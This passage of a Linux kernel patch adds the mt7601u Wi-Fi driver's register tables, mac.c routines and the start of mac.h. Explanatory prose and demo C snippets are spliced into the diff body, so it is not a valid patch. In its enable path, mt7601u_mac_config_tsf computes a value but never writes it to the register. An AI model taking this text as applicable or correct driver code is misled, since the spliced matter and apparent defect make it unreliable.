+ RF_REG_PAIR(4, 17, 0x23), + RF_REG_PAIR(4, 18, 0x02), + RF_REG_PAIR(4, 19, 0xa4), + RF_REG_PAIR(4, 20, 0x01), + RF_REG_PAIR(4, 21, 0x12), + RF_REG_PAIR(4, 22, 0x80), + RF_REG_PAIR(4, 23, 0xb3), + RF_REG_PAIR(4, 24, 0x00), /* reserved */ + RF_REG_PAIR(4, 25, 0x00), /* reserved */ + RF_REG_PAIR(4, 26, 0x00), /* reserved */ + RF_REG_PAIR(4, 27, 0x00), /* reserved */ + /* LOGEN */ + RF_REG_PAIR(4, 28, 0x18), + RF_REG_PAIR(4, 29, 0xee), + RF_REG_PAIR(4, 30, 0x6b), + RF_REG_PAIR(4, 31, 0x31), + RF_REG_PAIR(4, 32, 0x5d), + 
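A note on the encoding used by these tables: RF_REG_PAIR() folds the RF bank number into the register address, presumably so the RF init values can be fed through the same mt7601u_write_reg_pairs() helper used for the BBP and MAC tables, with the base baked into each entry instead of being passed separately. Expanding one of the entries above (MT_MCU_MEMMAP_RF left symbolic, as defined in the driver's MCU header):

	RF_REG_PAIR(4, 32, 0x5d)
		=> { MT_MCU_MEMMAP_RF | (4 << 16) | 32, 0x5d }
		=> { MT_MCU_MEMMAP_RF | 0x00040020, 0x5d }
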
RF_REG_PAIR(4, 33, 0x00), /* reserved */ + /* TX */ + RF_REG_PAIR(4, 34, 0x96), + RF_REG_PAIR(4, 35, 0x55), + RF_REG_PAIR(4, 36, 0x08), + RF_REG_PAIR(4, 37, 0xbb), + RF_REG_PAIR(4, 38, 0xb3), + RF_REG_PAIR(4, 39, 0xb3), + RF_REG_PAIR(4, 40, 0x03), + RF_REG_PAIR(4, 41, 0x00), /* reserved */ + RF_REG_PAIR(4, 42, 0x00), /* reserved */ + RF_REG_PAIR(4, 43, 0xc5), + RF_REG_PAIR(4, 44, 0xc5), + RF_REG_PAIR(4, 45, 0xc5), + RF_REG_PAIR(4, 46, 0x07), + RF_REG_PAIR(4, 47, 0xa8), + RF_REG_PAIR(4, 48, 0xef), + RF_REG_PAIR(4, 49, 0x1a), + /* PA */ + RF_REG_PAIR(4, 54, 0x07), + RF_REG_PAIR(4, 55, 0xa7), + RF_REG_PAIR(4, 56, 0xcc), + RF_REG_PAIR(4, 57, 0x14), + RF_REG_PAIR(4, 58, 0x07), + RF_REG_PAIR(4, 59, 0xa8), + RF_REG_PAIR(4, 60, 0xd7), + RF_REG_PAIR(4, 61, 0x10), + RF_REG_PAIR(4, 62, 0x1c), + RF_REG_PAIR(4, 63, 0x00), /* reserved */ +}; + +static const struct mt76_reg_pair rf_vga[] = { + RF_REG_PAIR(5, 0, 0x47), + RF_REG_PAIR(5, 1, 0x00), + RF_REG_PAIR(5, 2, 0x00), + RF_REG_PAIR(5, 3, 0x08), + RF_REG_PAIR(5, 4, 0x04), + RF_REG_PAIR(5, 5, 0x20), + RF_REG_PAIR(5, 6, 0x3a), + RF_REG_PAIR(5, 7, 0x3a), + RF_REG_PAIR(5, 8, 0x00), + RF_REG_PAIR(5, 9, 0x00), + RF_REG_PAIR(5, 10, 0x10), + RF_REG_PAIR(5, 11, 0x10), + RF_REG_PAIR(5, 12, 0x10), + RF_REG_PAIR(5, 13, 0x10), + RF_REG_PAIR(5, 14, 0x10), + RF_REG_PAIR(5, 15, 0x20), + RF_REG_PAIR(5, 16, 0x22), + RF_REG_PAIR(5, 17, 0x7c), + RF_REG_PAIR(5, 18, 0x00), + RF_REG_PAIR(5, 19, 0x00), + RF_REG_PAIR(5, 20, 0x00), + RF_REG_PAIR(5, 21, 0xf1), + RF_REG_PAIR(5, 22, 0x11), + RF_REG_PAIR(5, 23, 0x02), + RF_REG_PAIR(5, 24, 0x41), + RF_REG_PAIR(5, 25, 0x20), + RF_REG_PAIR(5, 26, 0x00), + RF_REG_PAIR(5, 27, 0xd7), + RF_REG_PAIR(5, 28, 0xa2), + RF_REG_PAIR(5, 29, 0x20), + RF_REG_PAIR(5, 30, 0x49), + RF_REG_PAIR(5, 31, 0x20), + RF_REG_PAIR(5, 32, 0x04), + RF_REG_PAIR(5, 33, 0xf1), + RF_REG_PAIR(5, 34, 0xa1), + RF_REG_PAIR(5, 35, 0x01), + RF_REG_PAIR(5, 41, 0x00), + RF_REG_PAIR(5, 42, 0x00), + RF_REG_PAIR(5, 43, 0x00), + RF_REG_PAIR(5, 44, 0x00), + RF_REG_PAIR(5, 45, 0x00), + RF_REG_PAIR(5, 46, 0x00), + RF_REG_PAIR(5, 47, 0x00), + RF_REG_PAIR(5, 48, 0x00), + RF_REG_PAIR(5, 49, 0x00), + RF_REG_PAIR(5, 50, 0x00), + RF_REG_PAIR(5, 51, 0x00), + RF_REG_PAIR(5, 52, 0x00), + RF_REG_PAIR(5, 53, 0x00), + RF_REG_PAIR(5, 54, 0x00), + RF_REG_PAIR(5, 55, 0x00), + RF_REG_PAIR(5, 56, 0x00), + RF_REG_PAIR(5, 57, 0x00), + RF_REG_PAIR(5, 58, 0x31), + RF_REG_PAIR(5, 59, 0x31), + RF_REG_PAIR(5, 60, 0x0a), + RF_REG_PAIR(5, 61, 0x02), + RF_REG_PAIR(5, 62, 0x00), + RF_REG_PAIR(5, 63, 0x00), +}; + +/* TODO: BBP178 is set to 0xff for "CCK CH14 OBW" which overrides the settings + * from channel switching. Seems stupid at best. 
+ */ +static const struct mt76_reg_pair bbp_high_temp[] = { + { 75, 0x60 }, + { 92, 0x02 }, + { 178, 0xff }, /* For CCK CH14 OBW */ + { 195, 0x88 }, { 196, 0x60 }, +}, bbp_high_temp_bw20[] = { + { 69, 0x12 }, + { 91, 0x07 }, + { 195, 0x23 }, { 196, 0x17 }, + { 195, 0x24 }, { 196, 0x06 }, + { 195, 0x81 }, { 196, 0x12 }, + { 195, 0x83 }, { 196, 0x17 }, +}, bbp_high_temp_bw40[] = { + { 69, 0x15 }, + { 91, 0x04 }, + { 195, 0x23 }, { 196, 0x12 }, + { 195, 0x24 }, { 196, 0x08 }, + { 195, 0x81 }, { 196, 0x15 }, + { 195, 0x83 }, { 196, 0x16 }, +}, bbp_low_temp[] = { + { 178, 0xff }, /* For CCK CH14 OBW */ +}, bbp_low_temp_bw20[] = { + { 69, 0x12 }, + { 75, 0x5e }, + { 91, 0x07 }, + { 92, 0x02 }, + { 195, 0x23 }, { 196, 0x17 }, + { 195, 0x24 }, { 196, 0x06 }, + { 195, 0x81 }, { 196, 0x12 }, + { 195, 0x83 }, { 196, 0x17 }, + { 195, 0x88 }, { 196, 0x5e }, +}, bbp_low_temp_bw40[] = { + { 69, 0x15 }, + { 75, 0x5c }, + { 91, 0x04 }, + { 92, 0x03 }, + { 195, 0x23 }, { 196, 0x10 }, + { 195, 0x24 }, { 196, 0x08 }, + { 195, 0x81 }, { 196, 0x15 }, + { 195, 0x83 }, { 196, 0x16 }, + { 195, 0x88 }, { 196, 0x5b }, +}, bbp_normal_temp[] = { + { 75, 0x60 }, + { 92, 0x02 }, + { 178, 0xff }, /* For CCK CH14 OBW */ + { 195, 0x88 }, { 196, 0x60 }, +}, bbp_normal_temp_bw20[] = { + { 69, 0x12 }, + { 91, 0x07 }, + { 195, 0x23 }, { 196, 0x17 }, + { 195, 0x24 }, { 196, 0x06 }, + { 195, 0x81 }, { 196, 0x12 }, + { 195, 0x83 }, { 196, 0x17 }, +}, bbp_normal_temp_bw40[] = { + { 69, 0x15 }, + { 91, 0x04 }, + { 195, 0x23 }, { 196, 0x12 }, + { 195, 0x24 }, { 196, 0x08 }, + { 195, 0x81 }, { 196, 0x15 }, + { 195, 0x83 }, { 196, 0x16 }, +}; + +#define BBP_TABLE(arr) { arr, ARRAY_SIZE(arr), } + +static const struct reg_table { + const struct mt76_reg_pair *regs; + size_t n; +} bbp_mode_table[3][3] = { + { + BBP_TABLE(bbp_normal_temp_bw20), + BBP_TABLE(bbp_normal_temp_bw40), + BBP_TABLE(bbp_normal_temp), + }, { + BBP_TABLE(bbp_high_temp_bw20), + BBP_TABLE(bbp_high_temp_bw40), + BBP_TABLE(bbp_high_temp), + }, { + BBP_TABLE(bbp_low_temp_bw20), + BBP_TABLE(bbp_low_temp_bw40), + BBP_TABLE(bbp_low_temp), + } +}; + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/mac.c b/drivers/net/wireless/mediatek/mt7601u/mac.c new file mode 100644 index 000000000000..c161bcc6a7fa --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/mac.c @@ -0,0 +1,569 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#include "mt7601u.h" +#include "trace.h" +#include + +static void +mt76_mac_process_tx_rate(struct ieee80211_tx_rate *txrate, u16 rate) +{ + u8 idx = MT76_GET(MT_TXWI_RATE_MCS, rate); + + txrate->idx = 0; + txrate->flags = 0; + txrate->count = 1; + + switch (MT76_GET(MT_TXWI_RATE_PHY_MODE, rate)) { + case MT_PHY_TYPE_OFDM: + txrate->idx = idx + 4; + return; + case MT_PHY_TYPE_CCK: + if (idx >= 8) + idx -= 8; + + txrate->idx = idx; + return; + case MT_PHY_TYPE_HT_GF: + txrate->flags |= IEEE80211_TX_RC_GREEN_FIELD; + /* fall through */ + case MT_PHY_TYPE_HT: + txrate->flags |= IEEE80211_TX_RC_MCS; + txrate->idx = idx; + break; + default: + WARN_ON(1); + return; + } + + if (MT76_GET(MT_TXWI_RATE_BW, rate) == MT_PHY_BW_40) + txrate->flags |= IEEE80211_TX_RC_40_MHZ_WIDTH; + + if (rate & MT_TXWI_RATE_SGI) + txrate->flags |= IEEE80211_TX_RC_SHORT_GI; +} + +static void +mt76_mac_fill_tx_status(struct mt7601u_dev *dev, struct ieee80211_tx_info *info, + struct mt76_tx_status *st) +{ + struct ieee80211_tx_rate *rate = info->status.rates; + int cur_idx, last_rate; + int i; + + last_rate = min_t(int, st->retry, IEEE80211_TX_MAX_RATES - 1); + mt76_mac_process_tx_rate(&rate[last_rate], st->rate); + if (last_rate < IEEE80211_TX_MAX_RATES - 1) + rate[last_rate + 1].idx = -1; + + cur_idx = rate[last_rate].idx + st->retry; + for (i = 0; i <= last_rate; i++) { + rate[i].flags = rate[last_rate].flags; + rate[i].idx = max_t(int, 0, cur_idx - i); + rate[i].count = 1; + } + + if (last_rate > 0) + rate[last_rate - 1].count = st->retry + 1 - last_rate; + + info->status.ampdu_len = 1; + info->status.ampdu_ack_len = st->success; + + if (st->is_probe) + info->flags |= IEEE80211_TX_CTL_RATE_CTRL_PROBE; + + if (st->aggr) + info->flags |= IEEE80211_TX_CTL_AMPDU | + IEEE80211_TX_STAT_AMPDU; + + if (!st->ack_req) + info->flags |= IEEE80211_TX_CTL_NO_ACK; + else if (st->success) + info->flags |= IEEE80211_TX_STAT_ACK; +} + +u16 mt76_mac_tx_rate_val(struct mt7601u_dev *dev, + const struct ieee80211_tx_rate *rate, u8 *nss_val) +{ + u16 rateval; + u8 phy, rate_idx; + u8 nss = 1; + u8 bw = 0; + + if (rate->flags & IEEE80211_TX_RC_MCS) { + rate_idx = rate->idx; + nss = 1 + (rate->idx >> 3); + phy = MT_PHY_TYPE_HT; + if (rate->flags & IEEE80211_TX_RC_GREEN_FIELD) + phy = MT_PHY_TYPE_HT_GF; + if (rate->flags & IEEE80211_TX_RC_40_MHZ_WIDTH) + bw = 1; + } else { + const struct ieee80211_rate *r; + int band = dev->chandef.chan->band; + u16 val; + + r = &dev->hw->wiphy->bands[band]->bitrates[rate->idx]; + if (rate->flags & IEEE80211_TX_RC_USE_SHORT_PREAMBLE) + val = r->hw_value_short; + else + val = r->hw_value; + + phy = val >> 8; + rate_idx = val & 0xff; + bw = 0; + } + + rateval = MT76_SET(MT_RXWI_RATE_MCS, rate_idx); + rateval |= MT76_SET(MT_RXWI_RATE_PHY, phy); + rateval |= MT76_SET(MT_RXWI_RATE_BW, bw); + if (rate->flags & IEEE80211_TX_RC_SHORT_GI) + rateval |= MT_RXWI_RATE_SGI; + + *nss_val = nss; + return rateval; +} + +void mt76_mac_wcid_set_rate(struct mt7601u_dev *dev, struct mt76_wcid *wcid, + const struct ieee80211_tx_rate *rate) +{ + unsigned long flags; + + spin_lock_irqsave(&dev->lock, flags); + wcid->tx_rate = mt76_mac_tx_rate_val(dev, rate, &wcid->tx_rate_nss); + wcid->tx_rate_set = true; + spin_unlock_irqrestore(&dev->lock, flags); +} + +struct mt76_tx_status mt7601u_mac_fetch_tx_status(struct mt7601u_dev *dev) +{ + struct mt76_tx_status stat = {}; + u32 val; + + val = mt7601u_rr(dev, MT_TX_STAT_FIFO); + stat.valid = !!(val & MT_TX_STAT_FIFO_VALID); + stat.success = !!(val & MT_TX_STAT_FIFO_SUCCESS); + 
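Two idioms recur in the status unpacking here: !!(val & FLAG) collapses a masked bit into 0/1 so it fits the one-bit bitfields of struct mt76_tx_status, and MT76_GET() extracts a multi-bit field by masking and shifting it down to bit 0. A self-contained sketch of the same unpacking, with a made-up register layout rather than the real MT_TX_STAT_FIFO_* masks:

#include <stdint.h>

#define DEMO_VALID	(1u << 0)	/* single-bit flag */
#define DEMO_WCID	(0xffu << 8)	/* 8-bit field at bits 15:8 */

struct demo_status {
	uint8_t valid:1;
	uint8_t wcid;
};

static struct demo_status demo_unpack(uint32_t val)
{
	struct demo_status st = {
		.valid = !!(val & DEMO_VALID),		/* 0 or 1, never truncated */
		.wcid = (val & DEMO_WCID) >> 8,		/* mask + shift, as MT76_GET() does */
	};

	return st;
}

/* demo_unpack(0x0000ab21) yields { .valid = 1, .wcid = 0xab } */
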
stat.aggr = !!(val & MT_TX_STAT_FIFO_AGGR); + stat.ack_req = !!(val & MT_TX_STAT_FIFO_ACKREQ); + stat.pktid = MT76_GET(MT_TX_STAT_FIFO_PID_TYPE, val); + stat.wcid = MT76_GET(MT_TX_STAT_FIFO_WCID, val); + stat.rate = MT76_GET(MT_TX_STAT_FIFO_RATE, val); + + return stat; +} + +void mt76_send_tx_status(struct mt7601u_dev *dev, struct mt76_tx_status *stat) +{ + struct ieee80211_tx_info info = {}; + struct ieee80211_sta *sta = NULL; + struct mt76_wcid *wcid = NULL; + void *msta; + + rcu_read_lock(); + if (stat->wcid < ARRAY_SIZE(dev->wcid)) + wcid = rcu_dereference(dev->wcid[stat->wcid]); + + if (wcid) { + msta = container_of(wcid, struct mt76_sta, wcid); + sta = container_of(msta, struct ieee80211_sta, + drv_priv); + } + + mt76_mac_fill_tx_status(dev, &info, stat); + ieee80211_tx_status_noskb(dev->hw, sta, &info); + rcu_read_unlock(); +} + +void mt7601u_mac_set_protection(struct mt7601u_dev *dev, bool legacy_prot, + int ht_mode) +{ + int mode = ht_mode & IEEE80211_HT_OP_MODE_PROTECTION; + bool non_gf = !!(ht_mode & IEEE80211_HT_OP_MODE_NON_GF_STA_PRSNT); + u32 prot[6]; + bool ht_rts[4] = {}; + int i; + + prot[0] = MT_PROT_NAV_SHORT | + MT_PROT_TXOP_ALLOW_ALL | + MT_PROT_RTS_THR_EN; + prot[1] = prot[0]; + if (legacy_prot) + prot[1] |= MT_PROT_CTRL_CTS2SELF; + + prot[2] = prot[4] = MT_PROT_NAV_SHORT | MT_PROT_TXOP_ALLOW_BW20; + prot[3] = prot[5] = MT_PROT_NAV_SHORT | MT_PROT_TXOP_ALLOW_ALL; + + if (legacy_prot) { + prot[2] |= MT_PROT_RATE_CCK_11; + prot[3] |= MT_PROT_RATE_CCK_11; + prot[4] |= MT_PROT_RATE_CCK_11; + prot[5] |= MT_PROT_RATE_CCK_11; + } else { + prot[2] |= MT_PROT_RATE_OFDM_24; + prot[3] |= MT_PROT_RATE_DUP_OFDM_24; + prot[4] |= MT_PROT_RATE_OFDM_24; + prot[5] |= MT_PROT_RATE_DUP_OFDM_24; + } + + switch (mode) { + case IEEE80211_HT_OP_MODE_PROTECTION_NONE: + break; + + case IEEE80211_HT_OP_MODE_PROTECTION_NONMEMBER: + ht_rts[0] = ht_rts[1] = ht_rts[2] = ht_rts[3] = true; + break; + + case IEEE80211_HT_OP_MODE_PROTECTION_20MHZ: + ht_rts[1] = ht_rts[3] = true; + break; + + case IEEE80211_HT_OP_MODE_PROTECTION_NONHT_MIXED: + ht_rts[0] = ht_rts[1] = ht_rts[2] = ht_rts[3] = true; + break; + } + + if (non_gf) + ht_rts[2] = ht_rts[3] = true; + + for (i = 0; i < 4; i++) + if (ht_rts[i]) + prot[i + 2] |= MT_PROT_CTRL_RTS_CTS; + + for (i = 0; i < 6; i++) + mt7601u_wr(dev, MT_CCK_PROT_CFG + i * 4, prot[i]); +} + +void mt7601u_mac_set_short_preamble(struct mt7601u_dev *dev, bool short_preamb) +{ + if (short_preamb) + mt76_set(dev, MT_AUTO_RSP_CFG, MT_AUTO_RSP_PREAMB_SHORT); + else + mt76_clear(dev, MT_AUTO_RSP_CFG, MT_AUTO_RSP_PREAMB_SHORT); +} + +void mt7601u_mac_config_tsf(struct mt7601u_dev *dev, bool enable, int interval) +{ + u32 val = mt7601u_rr(dev, MT_BEACON_TIME_CFG); + + val &= ~(MT_BEACON_TIME_CFG_TIMER_EN | + MT_BEACON_TIME_CFG_SYNC_MODE | + MT_BEACON_TIME_CFG_TBTT_EN); + + if (!enable) { + mt7601u_wr(dev, MT_BEACON_TIME_CFG, val); + return; + } + + val &= ~MT_BEACON_TIME_CFG_INTVAL; + val |= MT76_SET(MT_BEACON_TIME_CFG_INTVAL, interval << 4) | + MT_BEACON_TIME_CFG_TIMER_EN | + MT_BEACON_TIME_CFG_SYNC_MODE | + MT_BEACON_TIME_CFG_TBTT_EN; +} + +static void mt7601u_check_mac_err(struct mt7601u_dev *dev) +{ + u32 val = mt7601u_rr(dev, 0x10f4); + + if (!(val & BIT(29)) || !(val & (BIT(7) | BIT(5)))) + return; + + dev_err(dev->dev, "Error: MAC specific condition occurred\n"); + + mt76_set(dev, MT_MAC_SYS_CTRL, MT_MAC_SYS_CTRL_RESET_CSR); + udelay(10); + mt76_clear(dev, MT_MAC_SYS_CTRL, MT_MAC_SYS_CTRL_RESET_CSR); +} + +void mt7601u_mac_work(struct work_struct *work) +{ + struct 
mt7601u_dev *dev = container_of(work, struct mt7601u_dev, + mac_work.work); + struct { + u32 addr_base; + u32 span; + u64 *stat_base; + } spans[] = { + { MT_RX_STA_CNT0, 3, dev->stats.rx_stat }, + { MT_TX_STA_CNT0, 3, dev->stats.tx_stat }, + { MT_TX_AGG_STAT, 1, dev->stats.aggr_stat }, + { MT_MPDU_DENSITY_CNT, 1, dev->stats.zero_len_del }, + { MT_TX_AGG_CNT_BASE0, 8, &dev->stats.aggr_n[0] }, + { MT_TX_AGG_CNT_BASE1, 8, &dev->stats.aggr_n[16] }, + }; + u32 sum, n; + int i, j, k; + + /* Note: using MCU_RANDOM_READ is actually slower then reading all the + * registers by hand. MCU takes ca. 20ms to complete read of 24 + * registers while reading them one by one will takes roughly + * 24*200us =~ 5ms. + */ + + k = 0; + n = 0; + sum = 0; + for (i = 0; i < ARRAY_SIZE(spans); i++) + for (j = 0; j < spans[i].span; j++) { + u32 val = mt7601u_rr(dev, spans[i].addr_base + j * 4); + + spans[i].stat_base[j * 2] += val & 0xffff; + spans[i].stat_base[j * 2 + 1] += val >> 16; + + /* Calculate average AMPDU length */ + if (spans[i].addr_base != MT_TX_AGG_CNT_BASE0 && + spans[i].addr_base != MT_TX_AGG_CNT_BASE1) + continue; + + n += (val >> 16) + (val & 0xffff); + sum += (val & 0xffff) * (1 + k * 2) + + (val >> 16) * (2 + k * 2); + k++; + } + + atomic_set(&dev->avg_ampdu_len, n ? DIV_ROUND_CLOSEST(sum, n) : 1); + + mt7601u_check_mac_err(dev); + + ieee80211_queue_delayed_work(dev->hw, &dev->mac_work, 10 * HZ); +} + +void +mt7601u_mac_wcid_setup(struct mt7601u_dev *dev, u8 idx, u8 vif_idx, u8 *mac) +{ + u8 zmac[ETH_ALEN] = {}; + u32 attr; + + attr = MT76_SET(MT_WCID_ATTR_BSS_IDX, vif_idx & 7) | + MT76_SET(MT_WCID_ATTR_BSS_IDX_EXT, !!(vif_idx & 8)); + + mt76_wr(dev, MT_WCID_ATTR(idx), attr); + + if (mac) + memcpy(zmac, mac, sizeof(zmac)); + + mt7601u_addr_wr(dev, MT_WCID_ADDR(idx), zmac); +} + +void mt7601u_mac_set_ampdu_factor(struct mt7601u_dev *dev) +{ + struct ieee80211_sta *sta; + struct mt76_wcid *wcid; + void *msta; + u8 min_factor = 3; + int i; + + rcu_read_lock(); + for (i = 0; i < ARRAY_SIZE(dev->wcid); i++) { + wcid = rcu_dereference(dev->wcid[i]); + if (!wcid) + continue; + + msta = container_of(wcid, struct mt76_sta, wcid); + sta = container_of(msta, struct ieee80211_sta, drv_priv); + + min_factor = min(min_factor, sta->ht_cap.ampdu_factor); + } + rcu_read_unlock(); + + mt7601u_wr(dev, MT_MAX_LEN_CFG, 0xa0fff | + MT76_SET(MT_MAX_LEN_CFG_AMPDU, min_factor)); +} + +static void +mt76_mac_process_rate(struct ieee80211_rx_status *status, u16 rate) +{ + u8 idx = MT76_GET(MT_RXWI_RATE_MCS, rate); + + switch (MT76_GET(MT_RXWI_RATE_PHY, rate)) { + case MT_PHY_TYPE_OFDM: + if (WARN_ON(idx >= 8)) + idx = 0; + idx += 4; + + status->rate_idx = idx; + return; + case MT_PHY_TYPE_CCK: + if (idx >= 8) { + idx -= 8; + status->flag |= RX_FLAG_SHORTPRE; + } + + if (WARN_ON(idx >= 4)) + idx = 0; + + status->rate_idx = idx; + return; + case MT_PHY_TYPE_HT_GF: + status->flag |= RX_FLAG_HT_GF; + /* fall through */ + case MT_PHY_TYPE_HT: + status->flag |= RX_FLAG_HT; + status->rate_idx = idx; + break; + default: + WARN_ON(1); + return; + } + + if (rate & MT_RXWI_RATE_SGI) + status->flag |= RX_FLAG_SHORT_GI; + + if (rate & MT_RXWI_RATE_STBC) + status->flag |= 1 << RX_FLAG_STBC_SHIFT; + + if (rate & MT_RXWI_RATE_BW) + status->flag |= RX_FLAG_40MHZ; +} + +static void +mt7601u_rx_monitor_beacon(struct mt7601u_dev *dev, struct mt7601u_rxwi *rxwi, + u16 rate, int rssi) +{ + dev->bcn_freq_off = rxwi->freq_off; + dev->bcn_phy_mode = MT76_GET(MT_RXWI_RATE_PHY, rate); + dev->avg_rssi = (dev->avg_rssi * 15) / 16 + (rssi << 8); +} + 
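mt7601u_rx_monitor_beacon() above maintains avg_rssi as a cheap integer low-pass filter: the old value keeps a 15/16 weight and each new sample is mixed in pre-scaled by 256 (rssi << 8), so for a steady input the accumulator settles near 16 * 256 * rssi rather than 256 * rssi. A standalone model of the update, using a hypothetical constant -50 dBm input:

#include <stdio.h>

int main(void)
{
	int avg = 0;
	int i;

	for (i = 0; i < 128; i++)
		avg = (avg * 15) / 16 + (-50 * 256);	/* same update as the driver */

	/* settles close to 16 * 256 * -50 = -204800 */
	printf("avg = %d\n", avg);
	return 0;
}
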
+static int +mt7601u_rx_is_our_beacon(struct mt7601u_dev *dev, u8 *data) +{ + struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)data; + + return ieee80211_is_beacon(hdr->frame_control) && + ether_addr_equal(hdr->addr2, dev->ap_bssid); +} + +u32 mt76_mac_process_rx(struct mt7601u_dev *dev, struct sk_buff *skb, + u8 *data, void *rxi) +{ + struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb); + struct mt7601u_rxwi *rxwi = rxi; + u32 ctl = le32_to_cpu(rxwi->ctl); + u16 rate = le16_to_cpu(rxwi->rate); + int rssi; + + if (rxwi->rxinfo & cpu_to_le32(MT_RXINFO_DECRYPT)) { + status->flag |= RX_FLAG_DECRYPTED; + status->flag |= RX_FLAG_IV_STRIPPED | RX_FLAG_MMIC_STRIPPED; + } + + status->chains = BIT(0); + rssi = mt7601u_phy_get_rssi(dev, rxwi, rate); + status->chain_signal[0] = status->signal = rssi; + status->freq = dev->chandef.chan->center_freq; + status->band = dev->chandef.chan->band; + + mt76_mac_process_rate(status, rate); + + spin_lock_bh(&dev->con_mon_lock); + if (mt7601u_rx_is_our_beacon(dev, data)) + mt7601u_rx_monitor_beacon(dev, rxwi, rate, rssi); + else if (rxwi->rxinfo & cpu_to_le32(MT_RXINFO_U2M)) + dev->avg_rssi = (dev->avg_rssi * 15) / 16 + (rssi << 8); + spin_unlock_bh(&dev->con_mon_lock); + + return MT76_GET(MT_RXWI_CTL_MPDU_LEN, ctl); +} + +static enum mt76_cipher_type +mt76_mac_get_key_info(struct ieee80211_key_conf *key, u8 *key_data) +{ + memset(key_data, 0, 32); + if (!key) + return MT_CIPHER_NONE; + + if (key->keylen > 32) + return MT_CIPHER_NONE; + + memcpy(key_data, key->key, key->keylen); + + switch (key->cipher) { + case WLAN_CIPHER_SUITE_WEP40: + return MT_CIPHER_WEP40; + case WLAN_CIPHER_SUITE_WEP104: + return MT_CIPHER_WEP104; + case WLAN_CIPHER_SUITE_TKIP: + return MT_CIPHER_TKIP; + case WLAN_CIPHER_SUITE_CCMP: + return MT_CIPHER_AES_CCMP; + default: + return MT_CIPHER_NONE; + } +} + +int mt76_mac_wcid_set_key(struct mt7601u_dev *dev, u8 idx, + struct ieee80211_key_conf *key) +{ + enum mt76_cipher_type cipher; + u8 key_data[32]; + u8 iv_data[8]; + u32 val; + + cipher = mt76_mac_get_key_info(key, key_data); + if (cipher == MT_CIPHER_NONE && key) + return -EINVAL; + + trace_set_key(dev, idx); + + mt7601u_wr_copy(dev, MT_WCID_KEY(idx), key_data, sizeof(key_data)); + + memset(iv_data, 0, sizeof(iv_data)); + if (key) { + iv_data[3] = key->keyidx << 6; + if (cipher >= MT_CIPHER_TKIP) { + /* Note: start with 1 to comply with spec, + * (see comment on common/cmm_wpa.c:4291). 
+ */ + iv_data[0] |= 1; + iv_data[3] |= 0x20; + } + } + mt7601u_wr_copy(dev, MT_WCID_IV(idx), iv_data, sizeof(iv_data)); + + val = mt7601u_rr(dev, MT_WCID_ATTR(idx)); + val &= ~MT_WCID_ATTR_PKEY_MODE & ~MT_WCID_ATTR_PKEY_MODE_EXT; + val |= MT76_SET(MT_WCID_ATTR_PKEY_MODE, cipher & 7) | + MT76_SET(MT_WCID_ATTR_PKEY_MODE_EXT, cipher >> 3); + val &= ~MT_WCID_ATTR_PAIRWISE; + val |= MT_WCID_ATTR_PAIRWISE * + !!(key && key->flags & IEEE80211_KEY_FLAG_PAIRWISE); + mt7601u_wr(dev, MT_WCID_ATTR(idx), val); + + return 0; +} + +int mt76_mac_shared_key_setup(struct mt7601u_dev *dev, u8 vif_idx, u8 key_idx, + struct ieee80211_key_conf *key) +{ + enum mt76_cipher_type cipher; + u8 key_data[32]; + u32 val; + + cipher = mt76_mac_get_key_info(key, key_data); + if (cipher == MT_CIPHER_NONE && key) + return -EINVAL; + + trace_set_shared_key(dev, vif_idx, key_idx); + + mt7601u_wr_copy(dev, MT_SKEY(vif_idx, key_idx), + key_data, sizeof(key_data)); + + val = mt76_rr(dev, MT_SKEY_MODE(vif_idx)); + val &= ~(MT_SKEY_MODE_MASK << MT_SKEY_MODE_SHIFT(vif_idx, key_idx)); + val |= cipher << MT_SKEY_MODE_SHIFT(vif_idx, key_idx); + mt76_wr(dev, MT_SKEY_MODE(vif_idx), val); + + return 0; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/mac.h b/drivers/net/wireless/mediatek/mt7601u/mac.h new file mode 100644 index 000000000000..2c22d63c63a2 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/mac.h @@ -0,0 +1,178 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT76_MAC_H +#define __MT76_MAC_H + +struct mt76_tx_status { + u8 valid:1; + u8 success:1; + u8 aggr:1; + u8 ack_req:1; + u8 is_probe:1; + u8 wcid; + u8 pktid; + u8 retry; + u16 rate; +} __packed __aligned(2); + +/* Note: values in original "RSSI" and "SNR" fields are not actually what they + * are called for MT7601U, names used by this driver are educated guesses + * (see vendor mac/ral_omac.c). 
+ */ +struct mt7601u_rxwi { + __le32 rxinfo; + + __le32 ctl; + + __le16 frag_sn; + __le16 rate; + + u8 unknown; + u8 zero[3]; + + u8 snr; + u8 ant; + u8 gain; + u8 freq_off; + + __le32 resv2; + __le32 expert_ant; +} __packed __aligned(4); + +#define MT_RXINFO_BA BIT(0) +#define MT_RXINFO_DATA BIT(1) +#define MT_RXINFO_NULL BIT(2) +#define MT_RXINFO_FRAG BIT(3) +#define MT_RXINFO_U2M BIT(4) +#define MT_RXINFO_MULTICAST BIT(5) +#define MT_RXINFO_BROADCAST BIT(6) +#define MT_RXINFO_MYBSS BIT(7) +#define MT_RXINFO_CRCERR BIT(8) +#define MT_RXINFO_ICVERR BIT(9) +#define MT_RXINFO_MICERR BIT(10) +#define MT_RXINFO_AMSDU BIT(11) +#define MT_RXINFO_HTC BIT(12) +#define MT_RXINFO_RSSI BIT(13) +#define MT_RXINFO_L2PAD BIT(14) +#define MT_RXINFO_AMPDU BIT(15) +#define MT_RXINFO_DECRYPT BIT(16) +#define MT_RXINFO_BSSIDX3 BIT(17) +#define 